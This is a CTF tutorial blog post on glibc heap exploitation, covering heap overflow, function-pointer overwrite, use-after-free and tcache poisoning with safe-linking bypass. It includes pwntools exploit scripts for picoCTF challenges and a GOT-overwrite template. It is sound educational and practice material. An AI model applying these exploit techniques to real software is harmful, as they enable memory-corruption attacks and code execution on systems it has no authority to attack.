Heap Exploitation for CTF: From heap Overflow to tcache Poisoning

Heap exploitation is not scary. It is two questions.

You solved your first stack overflow last month. You wrote b'A'*72 + p64(win_addr) into a netcat pipe, the stack politely handed execution to win(), and the flag popped. You felt good. Then you tried a heap challenge. The writeups named tcache, fastbin, and Houses you had never heard of. You pasted the canonical tcache-poisoning script from a 2019 blog. It crashed inside _int_malloc. You read the post twice. You checked checksec. You gave up.

Here is what happened. The tutorial was written against glibc 2.31. Ubuntu 22.04 ships glibc 2.35. Safe-linking mangled every fd pointer you wrote, __free_hook was removed from the C library in 2021, and the top-chunk sanity check had already eaten half the older exploit techniques (the ones collectively named the Malloc Maleficarum after the Phrack series that cataloged them). The exploit you copied wasn't wrong. It was dated by three glibc releases.

The heap literature feels priestly because most of it is stale. Modern heap exploitation (the 2026 kind that actually works against a current Ubuntu binary) comes down to two questions:

Which bug does the binary expose?
Which GNU C Library (glibc) ships with it?

There are four bugs worth naming. They map onto a short ladder of primitives: linear overflow, function-pointer overwrite, use-after-free, and tcache poisoning. Everything older (every "House of X" pattern the Malloc Maleficarum blog posts teach, every __malloc_hook closing move) either died in a glibc patch or got replaced by a simpler technique the new allocator enabled. Nobody tells beginners this, so they spend a month learning the museum.

Tcache did not make heap exploitation harder. The thread-local cache glibc added in 2017 collapsed six older dialects into one, and the one is easier.

The picoCTF platform walks this ladder in order: heap 0, heap 1, heap 2, heap 3. Extend with Heap Havoc, Pizza Router, tea-cash, and Horsetrack, and you have the whole ladder in eight binaries.

If you have not solved stack overflow yet, start with the Buffer Overflow guide. If you are comfortable on the stack and want the sibling technique, ROP Beyond ret2libc picks up where leaks run out. This post is the next rung.

Key insight: The rule nobody writes down: every primitive in this post has a glibc version window. Outside that window, it's either blocked by a check or the mitigation it targets doesn't exist yet. A heap tutorial that doesn't tell you which glibc it assumes is not a tutorial. It is a historical artifact.

A ten-minute tour of the only allocator that matters

glibc ships a single allocator, ptmalloc2. Every Linux binary you will exploit in picoCTF, Hack The Box, or most major CTFs uses it. Three facts do most of the work.

Fact 1: a chunk is a header plus your data. When your program calls malloc(24), the allocator carves out a contiguous block: an 8-byte header, then the 24 bytes you asked for, padded up to a 16-byte boundary (the minimum chunk on 64-bit is 0x20 bytes, 32 in decimal). The header stores the chunk's total size with the bottom three bits repurposed as flags. The lowest bit, PREV_INUSE, tells the allocator whether the previous chunk is free. When two malloc calls happen back to back, the chunks end up adjacent in memory, separated only by that header. Write past the end of the first chunk and you land inside the second.

addr   | size/flags | your data
-------+------------+-------------------
0x100  | 0x21       | A A A A A A A ...   <- malloc(24)
0x120  | 0x21       | B B B B B B B ...   <- malloc(24), adjacent
0x140  | 0x21       | C C C C C C C ...
# size 0x21 = 0x20 (chunk size) | 0x1 (PREV_INUSE flag)

Fact 2: free chunks live in bins, and tcache is the only bin you care about first. The allocator keeps several free lists, sorted by chunk size: tcache, fastbins, small bins, unsorted, large bins. A beginner does not need the taxonomy. You need tcache, and you need to know when tcache fills up.

Tcache (the per-thread cache) was added in glibc 2.26 (August 2017) and changed the entire game. Every free of a chunk up to 0x410 bytes (about 1 KiB) goes into a thread-local singly-linked list instead of the shared arena. There are 64 such lists, one per size class. Each holds up to 7 chunks in last-in-first-out (LIFO) order, meaning the next malloc of that size pops the chunk you freed most recently. No locking, no metadata walk, no sanity checks that the chunk makes sense. That absence of checks is what modern heap exploitation is built on.

Each free chunk on the tcache list uses the first 8 bytes of its own user data to store a fd (forward) pointer to the next chunk on the list. Overwrite fd with a target address and the second malloc of that size returns the target. That sentence is the entire theory of tcache poisoning. You will meet it in Primitive 4.

Fact 3: three glibc dates bound your exploit.

glibc 2.26 (2017): tcache arrives. Pre-2.26 exploitation techniques (fastbin-first, unsorted-bin-attack, House of Force) start becoming museum pieces.
glibc 2.29 (2019): tcache double-free check added via a key field in the freed chunk. Naive free(a); free(a); now aborts. The key can still be cleared by other frees; the bypass is well-known.
glibc 2.32 (2020): Safe-linking lands. Tcache and fastbin fd pointers are mangled with PROTECT_PTR(pos, ptr) = (pos >> 12) ^ ptr, where pos is the address of the storage slot holding the pointer. You now need a heap leak to forge an fd. See Itkin's Check Point writeup for the original paper.
glibc 2.34 (2021): __free_hook, __malloc_hook, and __realloc_hook get removed from the API. Every pre-2021 heap tutorial ending with "now overwrite __free_hook with system" is a dead end on modern systems. I will come back to this in the kill-list.

Tip: Ubuntu 22.04 ships glibc 2.35. Ubuntu 24.04 ships glibc 2.39. Kali rolling is usually a minor version behind. If you are fighting a picoCTF 2024 binary, assume 2.35. Run ldd --version on the remote when you can, or check strings libc.so.6 | grep "GNU C Library" on a downloaded copy.

Primitive 1: Linear overflow is the stack bug with a new neighbor

The first primitive you already know in a different form. Write past the end of a heap buffer and you corrupt whatever the allocator put next. That "whatever" is usually either another chunk of user data or a chunk header.

picoCTF 2024 heap 0 is this bug at its gentlest. A 32-byte buffer sits adjacent to a global safe_var. You write 32 characters through the menu, and fgets's trailing null byte lands on the first byte of safe_var and zeroes it. Option 4 then prints the flag because the guard check passes. No pwntools, no ROP, just counting:

$ nc tethys.picoctf.net <PORT_FROM_INSTANCE>
...
> 2
Data: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
> 4
picoCTF{my_first_heap_overflow_...}

heap 1 tightens the same bug: instead of zeroing safe_var, the check now wants it to equal "pico". The payload becomes 'A'*32 + 'pico'. Same chunk, same offset, same primitive. The jump from heap 0 to heap 1 is the jump from "I can destroy a value" to "I can write a specific value at a specific place." That is the whole of exploit development in one step.

Heap Havoc (picoCTF 2026) is the same primitive dressed up. Two user-supplied names get malloc'd in sequence, the first buffer is undersized relative to the input it accepts, and the overflow corrupts the second buffer's contents. A short pwntools script:

from pwn import *
p = remote('mysterious-sea.picoctf.net', PORT)
first_name = b'A' * 64 + b'WIN\x00'   # overflow into second buffer
p.sendlineafter(b'name: ', first_name)
p.sendlineafter(b'name: ', b'ignored')
print(p.recvall().decode())

Note: Every linear-overflow challenge is a counting problem. The interesting number is not "how many bytes does my buffer hold" but "how many bytes until I reach the thing I care about." Read the source, or run it under GDB with pwndbg and type heap chunks to see the layout. Guessing here wastes hours.

The first time I saw how close these heap bugs were to stack buffer overflow, I felt annoyed. A whole category of exploitation had been hiding behind one scary word. It's not a new kind of bug. It's the same bug with a different neighbor.

Primitive 2: Function-pointer overwrite is ret2win on the heap

Promote the neighbor. If the chunk next door contains user data, you get data corruption (the heap 1 outcome). If it contains a function pointer, you get control of the instruction pointer the next time that pointer is called. This is the heap version of ret2win: the binary ships a function that prints the flag, you find its address, you redirect a pointer to call it.

heap 2 is the textbook version. The adjacent chunk holds a single function pointer that option 4 calls directly. The binary ships a dead win() function at a fixed address (the binary is compiled without Position-Independent Executable (PIE) support, so code addresses don't move between runs). The exploit is counting plus little-endian packing:

$ objdump -D chall | grep '<win>'
00000000004011a0 <win>:
# payload = 32 bytes of filler + little-endian pointer to win()
$ python3 -c "print(b'A'*32 + b'\xa0\x11\x40\x00\x00\x00\x00\x00')"

Pipe the payload in between menu option 2 (write) and option 4 (trigger) and win() fires. That's it. The mechanics are identical to ret2win on the stack: find the address, pack it, place it where a call will pick it up. The difference is the call happens through a heap pointer instead of a return address.

Pizza Router (picoCTF 2026) is the same primitive with two twists. The bug is a signed-integer index in a reroute command that accepts a negative number and uses it as an array index, giving you a one-shot out-of-bounds write to a heap offset of your choice. The target is a finish callback pointer sitting at heap offset +0x430 that gets fired on the next dispatch command. The second twist: the binary has PIE enabled, so every code address is randomized at startup. You first leak the PIE base through a different command (replay, which prints a value from the heap at +0x2260), then compute the win address before writing.

Key insight: Leak-plus-write is what most modern heap exploitation looks like. A real binary rarely gives you a pre-known win address. It gives you a bug that leaks a pointer and a bug that writes one. Half your exploit is the leak, half is the write, and the pairing is what beginners struggle with. The ASLR and PIE Bypass guide is the leak-half companion to this post.

Primitive 3: Use-after-free is the pointer you forgot to forget

This one is my favorite because it requires almost nothing from you. No overflow. No OOB index. Just the fact that free(p) does not clear p. It returns the chunk to the allocator and leaves your variable pointing at memory that now belongs to someone else. If the program dereferences p later and you already reallocated that memory with data you chose, the program reads your data thinking it is its own. That is the use-after-free (UAF) primitive, and tcache's LIFO ordering makes it deterministic: the next allocation of the same size is guaranteed to be the chunk you just freed.

The sequence that matters:

Program allocates a chunk, stores the pointer in x.
Program frees the chunk. x is now dangling.
Your exploit allocates a chunk of the same size class. Tcache is LIFO, so malloc hands you the same memory back, with whatever content you wrote.
Program reads through x. It reads your data.

heap 3 runs this script literally. The menu has a free option (5) and an allocate option (2). Free first, allocate second with 'A'*30 + 'pico', then option 4 walks the dangling pointer, reads "pico", and prints the flag. A six-line pwntools script:

from pwn import *
p = remote('tethys.picoctf.net', PORT)
p.sendlineafter(b'> ', b'5')                       # free first
p.sendlineafter(b'> ', b'2')                       # then allocate
p.sendlineafter(b'length: ', b'31')
p.sendlineafter(b'data: ', b'A'*30 + b'pico')     # reuse freed chunk
p.sendlineafter(b'> ', b'4')                       # trigger
print(p.recvall().decode())

The allocator hands the memory back because it does not know you still remember where it used to live. Your exploit is just a second reader of a note the program wrote to itself.

Horsetrack (picoGym 2023) is the same primitive one rung up. Horse objects are structs with a name pointer, a speed field, and a display function pointer at offset +0x10. The remove command frees the horse chunk but does not clear the pointer in the horse table. The next add with a same-size crafted name lands in the freed chunk. Place win()'s address at the function-pointer offset of your crafted name, call display on the original slot, and the program calls your pointer. UAF plus fn-pointer overwrite in one challenge.

Warning: glibc 2.29 added a tcache double-free check. If you free the same chunk twice without intermediate work, you get an abort. The check looks at a per-chunk key field; it is defeatable by freeing a different chunk in between (which clears keys on the list) or by overwriting the key before the second free. This matters in Primitive 4.

Primitive 4: Tcache poisoning is write-where plus allocate-there

This is the one the internet makes sound priestly. It is not. Three sentences.

One. Every freed tcache chunk stores a forward pointer fd in its first 8 bytes, pointing at the next freed chunk of the same size. Two. If you corrupt that fd to point at an address of your choosing, the allocator will happily link it into the free list anyway. Three. The next two malloc calls of that size return the head of the list and then the address you wrote, so you get an arbitrary malloc.

Here it is against a glibc without any mitigations:

# tcache list for size 0x30 starts empty
a = malloc(0x28)   # -> 0x5060
b = malloc(0x28)   # -> 0x5090
free(a)            # tcache[0x30]: 0x5060 -> NULL
free(b)            # tcache[0x30]: 0x5090 -> 0x5060 -> NULL
*(void**)b = &target   # corrupt b's fd pointer
                       # tcache[0x30]: 0x5090 -> &target -> ???
malloc(0x28)       # returns 0x5090 (pops head)
malloc(0x28)       # returns &target   <-- arbitrary write primitive

Two allocations, one arbitrary-address malloc. That is the whole technique against a glibc under 2.32. You can find this as tcache_poisoning.c in shellphish/how2heap in thirty lines of C, and it is the primitive you will see most often in modern CTF heap challenges (HackTheBox, DownUnderCTF, SekaiCTF, corCTF, LakeCTF).

Then safe-linking happened. In glibc 2.32 the fd field gets mangled on every write:

#define PROTECT_PTR(pos, ptr)  ((((size_t) pos) >> 12) ^ ((size_t) ptr))
#define REVEAL_PTR(ptr)        PROTECT_PTR(&ptr, ptr)

pos is the address of the storage slot holding the pointer (which is the address of the freed chunk itself, essentially a heap address). A raw write of &target into fd gets XORed with a mask on read, and the allocator jumps to a random-looking address and usually crashes. To make the attack work you need to know pos >> 12, which means you need a leak of a heap pointer. In practice you get one by reading a chunk that is already on the list (its fd has been mangled for you) and inverting the mask.

The helper is four lines of Python:

def mangle(pos, ptr):
    return (pos >> 12) ^ ptr
def demangle(mangled, pos):
    return (pos >> 12) ^ mangled  # pos = address of the fd slot

Getting the heap leak is usually the hardest part, so the mechanic is worth a minute. If a program lets you read the contents of a chunk that is already on the tcache list (through a UAF read, a print-after-free, or a leftover pointer), what you see is a mangled fd. That mangled value equals the next chunk's address XORed with (this_chunk_addr >> 12). Because the mask uses the page number of the chunk itself and chunks live at known offsets from the heap base, the top bits of the mangled value leak the top bits of the heap address. Shift the leak left by 12 and mask off the low twelve bits, and you recover the heap base. Then you can forge any mangled pointer you want.

Mainline pwntools does not ship a safe-linking helper, so expect to write mangle yourself. A working exploit against a 2.32+ binary looks like this:

from pwn import *
def mangle(pos, ptr):
    return (pos >> 12) ^ ptr
p = remote(HOST, PORT)
# 1) leak heap base (e.g. read a chunk that is already on the tcache list,
#    un-mangle its fd, recover (chunk_addr >> 12) << 12)
heap_base = (leak << 12) & ~0xfff
# 2) free two same-size chunks. glibc 2.29+ forbids A;A without a detour,
#    so use A;B or insert a key-clearing free between them.
free_chunk(a_idx)
free_chunk(b_idx)
# 3) corrupt b's fd to point at the target, mangled
target = elf.got['printf']          # GOT (Global Offset Table) slot,
                                    # writable under Partial RELRO
edit_freed(b_idx, p64(mangle(heap_base + b_offset, target)))
# 4) two mallocs: first pops b, second returns target
alloc(size)
arbitrary = alloc(size)             # == target
# 5) write through the returned pointer
write(arbitrary, p64(elf.sym['win']))

The picoCTF platform puts a constrained version of this primitive in tea-cash (picoCTF 2026). The interface gives you a single byte write at a chosen heap offset, which is just enough to rewrite a few bytes of a freed chunk's fd and redirect the next allocation. It is a good rehearsal of the technique with training wheels: no full pwntools exploit required, just the mental model of "the fd pointer is the next malloc."

Tip: If a tcache-poisoning exploit silently produces garbage, the mask is almost always wrong. Print heap_base, print mangle(pos, target), print the actual bytes you are writing. A mangled pointer has a distinctive shape: the top nibble of a 48-bit userland pointer XORed with random-looking middle bytes. If your mangled value still looks like a clean heap pointer, you forgot to mangle it.

Dead primitives: the kill-list (don't waste a week here)

Three things every pre-2021 heap tutorial teaches that are useless on Ubuntu 22.04 or newer. You will run into them in older writeups, blog posts, and the original Phrack 57:8 and 66:10 articles that invented the "House of X" naming convention. A "house" is just a nickname for a specific chain of allocator-state manipulations that produces an arbitrary write. These three houses no longer work. I wish someone had shown me this list before I spent an afternoon reimplementing House of Force.

House of Force

Corrupt the top chunk's size field to a huge value, then malloc anywhere. Patched in glibc 2.29 (2019) by adding achunksize <= av->system_mem sanity check on the top chunk. Dead everywhere a picoCTF binary will land. If a tutorial still opens with this, its dating stamp is 2017.

Fastbin dup

Classic double-free into fastbin then two mallocs. Replaced by tcache poisoning once glibc 2.26 started routing small frees through tcache first. Tightened again in later glibc releases with a stronger fastbin check. Even before the patches, tcache swallowed most chunk sizes before fastbin saw them, so the demo rarely triggered on a real binary. Honorably retired.

__free_hook / __malloc_hook

The canonical closing move of every 2016-2020 tutorial: "overwrite __free_hook with system, call free("/bin/sh"), shell." Removed from the public API in glibc 2.34 (August 2021). The symbols exist as compatibility stubs and have zero effect on runtime behavior. On Ubuntu 22.04 you can't reach a shell this way.

The next rung up from tcache poisoning, where you need one, is FILE struct attacks (also called File Stream Oriented Programming, or FSOP): overwrite an _IO_FILE vtable pointer so that the next call to fflush, exit, or a stderr write jumps somewhere under your control. It is the modern replacement for __free_hook. Beyond the scope of this post, but worth knowing by name the first time you hit a glibc 2.35 challenge where tcache alone does not close the loop. Read how2heap for the canonical demonstrations.

Note: If a writeup looks promising but the author does not name the glibc version, treat it as suspicious until you have checked the dates. Heap tutorials rot fast.

The three things that actually kill these chains

A tcache-poisoning exploit that compiles and looks right but hands you garbage on the remote is almost never the technique. In decreasing order of how often they bite:

1. Forgot safe-linking

Ubuntu 20.04 and newer ship glibc 2.31+, and 22.04 is 2.35. If you are following a 2019 tutorial and writing raw pointers into fd, the allocator is mangling them on read and jumping to nonsense. Symptom: clean exploit, instant SIGSEGV inside _int_malloc. Fix: mangle every pointer you put on a singly-linked list.

2. Wrong chunk size class

Tcache is size-indexed. A chunk freed at size 0x30 goes on a different list than a chunk freed at 0x40. If your target allocation is a different size than the one you corrupted, the head you poisoned is never consulted. Run heap bins in pwndbg and watch your list grow before you commit to the attack.

3. Misread offset

Chunk alignment rounds up to 16 bytes on 64-bit, and the header is another 16 above the returned pointer. "The buffer is 32 bytes" does not mean the next thing is exactly 32 bytes away. Step through a free with GDB and inspect the chunk at p - 0x10 before you guess.

The common thread is that all three failures look like the exploit working: no crash, no printf, no feedback. They fail silently. When a heap exploit is silent, it's almost always not landing where you think.

Quick reference

The ladder: bug to primitive

Primitive	Bug shape	picoCTF receipts	Works on glibc
P1: Linear overflow	Write past the buffer end into the neighbor's data	heap 0, heap 1, Heap Havoc	All
P2: Fn-ptr overwrite	Overflow or out-of-bounds (OOB) write lands on a callback pointer	heap 2, Pizza Router	All
P3: Use-after-free	Program keeps pointer after free, you reallocate the chunk	heap 3, Horsetrack	All (tcache LIFO makes it deterministic)
P4: Tcache poisoning	Corrupt fd pointer on free list, malloc returns attacker address	tea-cash	2.26+ (plus safe-linking mangle on 2.32+)

Decision order when you see a heap challenge

checksec --file ./vuln. Note PIE, RELRO, canary. Note the glibc version from the provided libc.so.6 if one ships with the challenge.
Read the source or the menu. Classify the bug: overflow, OOB write, UAF, double-free, off-by-one.
Match bug to primitive. Overflow into adjacent data is P1. Overflow reaching a function pointer is P2. Dangling pointer after free is P3. Control over a freed chunk's fd is P4.
If the glibc is 2.32 or newer, assume safe-linking. Find a heap leak first, then write the exploit.
If the glibc is 2.34 or newer, __free_hook is gone. Plan a FILE struct or win-function pivot instead.

pwntools cheat sheet

# Linear overflow / fn-ptr (P1/P2)
p.sendline(b'A'*OFFSET + p64(win_addr))
# Use-after-free (P3)
free(idx); alloc(size, payload); trigger(idx)
# Safe-linking mangle for tcache (P4)
def mangle(pos, ptr): return (pos >> 12) ^ ptr
# Reveal a mangled fd (pos = address of the fd slot)
def demangle(m, pos): return (pos >> 12) ^ m
# Inspect the heap while iterating
gdb.attach(p, 'heap chunks')

Everything above is four ideas and one XOR. The literature obscures that because the literature is organized by primitive name instead of by bug shape. Read it with the mapping in your head, and the priesthood collapses into a lookup table.

One concrete move. Open heap 0. Solve it in under five minutes. Then walk the series in order: heap 1, heap 2, heap 3, Heap Havoc, Pizza Router, tea-cash, Horsetrack. Before you read any writeup, name the primitive and the glibc it targets out loud. The allocator was never the hard part.